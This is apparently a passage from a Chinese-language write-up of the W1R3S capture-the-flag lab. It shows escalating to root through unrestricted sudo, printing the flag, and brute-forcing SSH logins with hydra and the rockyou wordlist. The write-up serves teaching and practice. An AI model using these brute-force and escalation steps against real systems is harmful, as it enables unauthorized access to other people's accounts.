Well,........possibly.
----------------------
[email protected] password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
108 packages can be updated.
6 updates are security updates.
.....You made it huh?....
Last login: Mon Jan 22 22:47:27 2018 from 192.168.0.35
w1r3s@W1R3S:~$
|
看看当前账号的权限。
1
2
3
4
5
|
w1r3s@W1R3S:~$ whoami
w1r3s
w1r3s@W1R3S:~$ id
uid=1000(w1r3s) gid=1000(w1r3s) groups=1000(w1r3s),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
|
注意看这个账号 groups 组里面有 27(sudo) 的权限,接着看看这个账号有什么权限。
1
2
3
4
5
6
7
8
9
10
|
w1r3s@W1R3S:~$ uname -a
Linux W1R3S 4.13.0-36-generic #40~16.04.1-Ubuntu SMP Fri Feb 16 23:25:58 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
w1r3s@W1R3S:~$ sudo -l
[sudo] password for w1r3s:
Matching Defaults entries for w1r3s on W1R3S.localdomain:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User w1r3s may run the following commands on W1R3S.localdomain:
(ALL : ALL) ALL
|
(ALL : ALL) ALL 这里也就是这个账号有全部权限,那就相当于是 root 了,简单提权一下。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
|
w1r3s@W1R3S:~$ sudo /bin/bash
root@W1R3S:~# whoami
root
root@W1R3S:~# id
uid=0(root) gid=0(root) groups=0(root)
root@W1R3S:~# uname -a
Linux W1R3S 4.13.0-36-generic #40~16.04.1-Ubuntu SMP Fri Feb 16 23:25:58 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
root@W1R3S:~# cd /root
root@W1R3S:/root# cat flag.txt
-----------------------------------------------------------------------------------------
____ ___ _ _ ____ ____ _ _____ _ _ _ _ _____ ___ ___ _ _ ____
/ ___/ _ \| \ | |/ ___| _ \ / \|_ _| | | | | / \|_ _|_ _/ _ \| \ | / ___|
| | | | | | \| | | _| |_) | / _ \ | | | | | | | / _ \ | | | | | | | \| \___ \
| |__| |_| | |\ | |_| | _ < / ___ \| | | |_| | |___ / ___ \| | | | |_| | |\ |___) |
\____\___/|_| \_|\____|_| \_\/_/ \_\_| \___/|_____/_/ \_\_| |___\___/|_| \_|____/
-----------------------------------------------------------------------------------------
.-----------------TTTT_-----_______
/''''''''''(______O] ----------____ \______/]_
__...---'"""\_ --'' Q ___________@
|''' ._ _______________=---------"""""""
| ..--''| l L |_l |
| ..--'' . /-___j ' '
| ..--'' / , ' '
|--'' / ` \
L__' \ -
- '-.
'. /
'-./
----------------------------------------------------------------------------------------
YOU HAVE COMPLETED THE
__ __ ______________________ _________
/ \ / \/_ \______ \_____ \ / _____/
\ \/\/ / | || _/ _(__ < \_____ \
\ / | || | \/ \/ \
\__/\ / |___||____|_ /______ /_______ /.INC
\/ \/ \/ \/ CHALLENGE, V 1.0
----------------------------------------------------------------------------------------
CREATED BY SpecterWires
----------------------------------------------------------------------------------------
|
构造用户字典这里的用户字典需要结合 FTP 泄露信息来构造:
1
2
3
4
5
6
|
$ echo '''w1r3s
admin
root
naomi
hector
''' > user.list
|
使用 hydra 对 SSH 暴力破解:
1
2
3
4
5
6
7
8
9
10
11
12
|
# -L 指定用户名
# -P 指定字典
# -t 4 用四线程的方式破解
$ hydra -L user.list -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.130 -t 4
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-28 10:39:27
[DATA] max 4 tasks per 1 server, overall 4 tasks, 86066394 login tries (l:6/p:14344399), ~21516599 tries per task
[DATA] attacking ssh://10.10.10.130:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 86066350 to do in 32600:54h, 4 active
[22][ssh] host: 10.10.10.130 login: w1r3s password: computer
[STATUS] 4781475.00 tries/min, 14344425 tries in 00:03h, 71721969 to do in 00:15h, 4 active
|
密码破解成功。